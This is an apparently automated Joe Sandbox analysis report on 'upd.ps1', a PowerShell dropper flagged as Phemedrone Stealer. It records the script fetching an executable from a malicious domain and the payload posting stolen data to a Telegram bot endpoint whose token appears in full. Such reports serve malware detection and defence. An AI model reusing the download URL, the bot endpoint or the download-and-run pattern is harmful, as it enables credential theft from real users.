Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
upd.ps1

Overview

General Information

Sample name:upd.ps1
Analysis ID:1548283
MD5:901388115be5c8209d83642d8d5d9b51
SHA1:d2293a97b9772328bb60e822027063deffba0c4d
SHA256:b54e7cd114b771b8b81e8c9b461ab611c3a5fddc575bdf1da132f5863c5d1e72
Tags:apitradingview-comps1user-JAMESWT_MHT
Infos:

Detection

Phemedrone Stealer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for dropped file
Yara detected Generic Stealer
Yara detected Phemedrone Stealer
AI detected suspicious sample
Machine Learning detection for dropped file
Powershell drops PE file
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Uses the Telegram API (likely for C&C communication)
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Suricata IDS alerts with low severity for network traffic
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication

Classification

Process Tree

  • System is w10x64
  • powershell.exe (PID: 7300 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\upd.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 7324 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • WDSecureUtility_594.exe (PID: 7560 cmdline: "C:\Users\user\AppData\Roaming\WDSecureUtility_594.exe" -pkek -aoa -y MD5: 0FF0576F91E4F548CA0D223462B2586C)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000003.00000002.1535729203.0000027410066000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_PhemedroneStealerYara detected Phemedrone StealerJoe Security
    00000003.00000002.1535729203.0000027410066000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_GenericStealer_9Yara detected Generic StealerJoe Security
      00000003.00000002.1534247487.0000027400242000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_PhemedroneStealerYara detected Phemedrone StealerJoe Security
        00000003.00000002.1535729203.00000274100C6000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_PhemedroneStealerYara detected Phemedrone StealerJoe Security
          00000003.00000002.1535729203.00000274100C6000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_GenericStealer_9Yara detected Generic StealerJoe Security
            Click to see the 6 entries

            Sigma Signatures

            System Summary

            barindex
            Sigma detected: Change PowerShell Policies to an Insecure Level
            Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\upd.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\upd.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4084, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\upd.ps1", ProcessId: 7300, ProcessName: powershell.exe
            Sigma detected: Potential Binary Or Script Dropper Via PowerShell
            Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7300, TargetFilename: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exe
            Sigma detected: Non Interactive PowerShell Process Spawned
            Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\upd.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\upd.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4084, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\upd.ps1", ProcessId: 7300, ProcessName: powershell.exe

            Suricata Signatures

            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-11-04T09:42:32.976382+010020229301A Network Trojan was detected172.202.163.200443192.168.2.849708TCP
            2024-11-04T09:43:13.139898+010020229301A Network Trojan was detected172.202.163.200443192.168.2.849713TCP

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Antivirus detection for URL or domain
            Source: https://apitradingview.comAvira URL Cloud: Label: malware
            Source: https://apitradingview.com/WDSecureUtility.exeAvira URL Cloud: Label: malware
            Source: http://apitradingview.comAvira URL Cloud: Label: malware
            Multi AV Scanner detection for dropped file
            Source: :newads (copy)ReversingLabs: Detection: 68%
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeReversingLabs: Detection: 68%
            AI detected suspicious sample
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.8% probability
            Machine Learning detection for dropped file
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeJoe Sandbox ML: detected
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeCode function: 3_2_00007FFB4B4FFCE2 CryptUnprotectData,3_2_00007FFB4B4FFCE2
            Source: unknownHTTPS traffic detected: 86.104.15.60:443 -> 192.168.2.8:49705 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.67.70.233:443 -> 192.168.2.8:49706 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.8:49707 version: TLS 1.2
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior

            Networking

            barindex
            Uses the Telegram API (likely for C&C communication)
            Source: unknownDNS query: name: api.telegram.org
            Source: global trafficHTTP traffic detected: GET /v1/ip/geo.json HTTP/1.1Host: get.geojs.ioConnection: Keep-Alive
            Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
            Source: Joe Sandbox ViewIP Address: 86.104.15.60 86.104.15.60
            Source: Joe Sandbox ViewIP Address: 172.67.70.233 172.67.70.233
            Source: Joe Sandbox ViewASN Name: TELEGRAMRU TELEGRAMRU
            Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
            Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 172.202.163.200:443 -> 192.168.2.8:49713
            Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 172.202.163.200:443 -> 192.168.2.8:49708
            Source: global trafficHTTP traffic detected: GET /WDSecureUtility.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: apitradingview.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot8091768794:AAFZsJ1h-6BiszgyLm-eH6c-uITQ7Z99Wbc/sendDocument HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/602.37 (KHTML, like Gecko) Chrome/49.0.1422.399 Safari/600Content-Type: multipart/form-data; boundary=----------------------------8dcfc82b23332caHost: api.telegram.orgContent-Length: 239842Expect: 100-continueConnection: Keep-Alive
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficHTTP traffic detected: GET /WDSecureUtility.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: apitradingview.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /v1/ip/geo.json HTTP/1.1Host: get.geojs.ioConnection: Keep-Alive
            Source: global trafficDNS traffic detected: DNS query: apitradingview.com
            Source: global trafficDNS traffic detected: DNS query: get.geojs.io
            Source: global trafficDNS traffic detected: DNS query: api.telegram.org
            Source: unknownHTTP traffic detected: POST /bot8091768794:AAFZsJ1h-6BiszgyLm-eH6c-uITQ7Z99Wbc/sendDocument HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/602.37 (KHTML, like Gecko) Chrome/49.0.1422.399 Safari/600Content-Type: multipart/form-data; boundary=----------------------------8dcfc82b23332caHost: api.telegram.orgContent-Length: 239842Expect: 100-continueConnection: Keep-Alive
            Source: WDSecureUtility_594.exe, 00000003.00000002.1534247487.0000027400083000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.telegram.org
            Source: powershell.exe, 00000000.00000002.1559813700.000001B18165B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://apitradingview.com
            Source: powershell.exe, 00000000.00000002.1584441203.000001B1901B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1559813700.000001B181B0F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1584441203.000001B19006E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
            Source: powershell.exe, 00000000.00000002.1559813700.000001B180233000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
            Source: WDSecureUtility_594.exe, 00000003.00000002.1534247487.0000027400083000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
            Source: powershell.exe, 00000000.00000002.1559813700.000001B180001000.00000004.00000800.00020000.00000000.sdmp, WDSecureUtility_594.exe, 00000003.00000002.1534247487.0000027400001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: WDSecureUtility_594.exe, 00000003.00000002.1534247487.0000027400083000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
            Source: powershell.exe, 00000000.00000002.1559813700.000001B180233000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
            Source: WDSecureUtility_594.exe, 00000003.00000002.1535729203.0000027410268000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: powershell.exe, 00000000.00000002.1559813700.000001B180001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
            Source: WDSecureUtility_594.exe, 00000003.00000002.1534247487.0000027400083000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.tele
            Source: WDSecureUtility_594.exe, 00000003.00000002.1534247487.0000027400083000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
            Source: WDSecureUtility_594.exe, 00000003.00000002.1534247487.0000027400083000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
            Source: WDSecureUtility_594.exe, 00000003.00000002.1534247487.0000027400001000.00000004.00000800.00020000.00000000.sdmp, WDSecureUtility_594.exe, 00000003.00000002.1534247487.0000027400083000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot8091768794:AAFZsJ1h-6BiszgyLm-eH6c-uITQ7Z99Wbc/sendDocument
            Source: powershell.exe, 00000000.00000002.1559813700.000001B181633000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://apitradingview.com
            Source: powershell.exe, 00000000.00000002.1559813700.000001B181633000.00000004.00000800.00020000.00000000.sdmp, upd.ps1String found in binary or memory: https://apitradingview.com/WDSecureUtility.exe
            Source: WDSecureUtility_594.exe, 00000003.00000002.1535729203.0000027410268000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: WDSecureUtility_594.exe, 00000003.00000002.1535729203.0000027410268000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: WDSecureUtility_594.exe, 00000003.00000002.1535729203.0000027410268000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: powershell.exe, 00000000.00000002.1584441203.000001B19006E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
            Source: powershell.exe, 00000000.00000002.1584441203.000001B19006E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
            Source: powershell.exe, 00000000.00000002.1584441203.000001B19006E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
            Source: WDSecureUtility_594.exe, 00000003.00000002.1535729203.0000027410268000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: WDSecureUtility_594.exe, 00000003.00000002.1535729203.0000027410268000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: WDSecureUtility_594.exe, 00000003.00000002.1535729203.0000027410268000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: WDSecureUtility_594.exe, 00000003.00000002.1534247487.0000027400001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://get.geojs.io
            Source: WDSecureUtility_594.exe, 00000003.00000002.1534247487.0000027400001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://get.geojs.io/v1/ip/geo.json
            Source: powershell.exe, 00000000.00000002.1559813700.000001B180233000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
            Source: powershell.exe, 00000000.00000002.1559813700.000001B180C33000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
            Source: powershell.exe, 00000000.00000002.1584441203.000001B1901B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1584441203.000001B19006E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
            Source: WDSecureUtility_594.exe, 00000003.00000002.1534247487.0000027400001000.00000004.00000800.00020000.00000000.sdmp, WDSecureUtility_594.exe, 00000003.00000002.1534247487.000002740038B000.00000004.00000800.00020000.00000000.sdmp, WDSecureUtility_594.exe, 00000003.00000002.1535729203.0000027410066000.00000004.00000800.00020000.00000000.sdmp, WDSecureUtility_594.exe, 00000003.00000002.1534247487.0000027400083000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://t.me/
            Source: WDSecureUtility_594.exe, 00000003.00000002.1534247487.0000027400215000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://t.me/TheDyer
            Source: WDSecureUtility_594.exe, 00000003.00000002.1534247487.0000027400001000.00000004.00000800.00020000.00000000.sdmp, WDSecureUtility_594.exe, 00000003.00000002.1534247487.000002740038B000.00000004.00000800.00020000.00000000.sdmp, WDSecureUtility_594.exe, 00000003.00000002.1535729203.0000027410066000.00000004.00000800.00020000.00000000.sdmp, WDSecureUtility_594.exe, 00000003.00000002.1534247487.0000027400083000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://t.me/freakcodingspot
            Source: WDSecureUtility_594.exe, 00000003.00000002.1534247487.0000027400215000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://t.me/webster480
            Source: WDSecureUtility_594.exe, 00000003.00000002.1535729203.0000027410268000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
            Source: WDSecureUtility_594.exe, 00000003.00000002.1535729203.0000027410268000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
            Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
            Source: unknownHTTPS traffic detected: 86.104.15.60:443 -> 192.168.2.8:49705 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.67.70.233:443 -> 192.168.2.8:49706 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.8:49707 version: TLS 1.2

            System Summary

            barindex
            Powershell drops PE file
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeJump to dropped file
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFB4B4F0F8D0_2_00007FFB4B4F0F8D
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeCode function: 3_2_00007FFB4B508C863_2_00007FFB4B508C86
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeCode function: 3_2_00007FFB4B50EB033_2_00007FFB4B50EB03
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeCode function: 3_2_00007FFB4B50B1FA3_2_00007FFB4B50B1FA
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeCode function: 3_2_00007FFB4B509A323_2_00007FFB4B509A32
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeCode function: 3_2_00007FFB4B4F9E0D3_2_00007FFB4B4F9E0D
            Source: WDSecureUtility_594.exe.0.dr, -.csBase64 encoded string: 'TBYRUlFZVF1ABwsFHgYPVw0WNlMHFAoDCUQJFAIoBxl0WxddGgYWU05IHhAECAYGFQ4DSw4='
            Source: WDSecureUtility_594.exe.0.dr, -.csBase64 encoded string: 'ZHE0czA3RTINBwMQGA0nHFlRWHAhLChRNQMAQkQ2OwdYVx1FAEMyOSc4K1EmGwQWUkcLfxdDWFE='
            Source: WDSecureUtility_594.exe.0.dr, -.csBase64 encoded string: 'VFsVGB8KBxQQHhdfHAgTDWt9FlIWGwAVJigyFx8FDioHGhFYFwYdFAYODF8aDB0QW1Aa'
            Source: WDSecureUtility_594.exe.0.dr, -.csBase64 encoded string: 'Oj5YFlNDSRVaUgxfElFTFxsUWBZTbm9RQkpOSU5RU00PDEAOS1tFUUJKPhkTBA4RRVsWU1MwERQDBgsDe2NLVRcUGG9LW11JWlJWKFFJS1UXT0gMFwdKPC9FFwgPEEs9fw4VW0kQFgxvYE5RVklLVVdtQA5LOkJRQkpOUVYtDgNSWBdGFgdFExtKBgUCGRhPGBsMGB4GSgYHCB0FExtfTQcUXhYbFxEBEVBBXgJHBhAYYBBTNxoAA29gTlFWSUtVFxQYb1RDRVFCSk5RVj0KEg0UAwcObm98aEpOUVZERlgaGVhxFgwJHgELGhgZB0sxVkAZFl5OSFxPZ2R8fBJZWRoGTUsIUBh8aBFaXVtbXghMAQUWWxhTDEtnZApBRUZHAkkDDg5ubwpbRkNDQxQQRAdJdTwIUlRdT1hbDA1YWQg6PnU8U0NFUU9HQ1xbSSMURVAPVwEGRTgMDAFRW0RGWBo5cjt5GFRCTkdcRAsSWkFKaAMHRh5FfGgRX0daRFlASk9JAQ5DHkBaF2N7DVhSWRoGTUsIUVUMb2AVQ0dFRkcCSQMEQR5oexlYXV1bW14ITAZMS35pHkNXRkNDQxQQRwFJdTwIUVJdT1hbDA1bUwgXczo7eW5vUUJKTlxbREZYF2YdRhwREVEhBQAFEwcfBhcZVRteTmh7b2AVQ09FRkcCSQMFQx5oexlZX11bW14ITAdKS35pHkJRRkNDQxQQRgNJdTwIUFBdT1hbDA1aXQg6PgMFRE9IQ1cXFUJOFGZ/TAdBGl5RUAwZXl4Me2MQQQYYVQRGHh5FUBdje3tjEEEESXU8CFdRDG9gY3tWSUtVGhlVG15DKBgRCQsdGggFEFhBCxZeTkhcT2dkfHwSX0AbGUoDDhhRRx9nZApCXkdYBQEFTUdbGHxoEVpIWkRZQEpPTQYO', 'HWQQUx4GAQMNBAtRJR0OFFtRChYhBhUeEB5EUSoVSxdOFDhBFgEWBQcYWklGSU1Vd2AQUzcaAANvYGN7FgkLVRoUMWZJQx5BH0oyWQ1YFikeOXIWXkMxEAVQTgpEFEsOBEl1PFNORSEDGR0GGRsPBg0UAwIObm9RT0otHhkCAhBEDlhNRh5oe0JHTiYXBQcQQ0dCFghVGHxoCg4Re2MQQko5ck1LHmh7b2AuFwQMCh5UWxxfHQQWAQ0e'
            Source: WDSecureUtility_594.exe.0.dr, -.csBase64 encoded string: 'YkQfRBIHAEtCHQsTBQYIHlJAdTwwDAsfBwkaGBkHUVViRB9EEgcAfGg5CxJbPg4XZFsbXRYXSDoHE1RREi4DGX58Nl4ROycCODksBBRbXh9tZUULfmk2FAFHORQUOgQWXFEMGyUGFwILBQBLVlhYeD05cg=='
            Source: classification engineClassification label: mal100.troj.spyw.evad.winPS1@4/8@3/3
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeJump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeMutant created: NULL
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7324:120:WilError_03
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeMutant created: \Sessions\1\BaseNamedObjects\Ycanaxotybererutoxotetecugofifa
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_arohrkmb.100.ps1Jump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2584
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7324
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5876
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3596
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5164
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6456
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2576
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3436
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4728
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1800
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2140
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2568
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1704
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 408
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3852
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5572
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3844
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3412
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4852
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5996
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2544
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6852
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2108
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6848
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2588
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2532
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6092
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5976
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 372
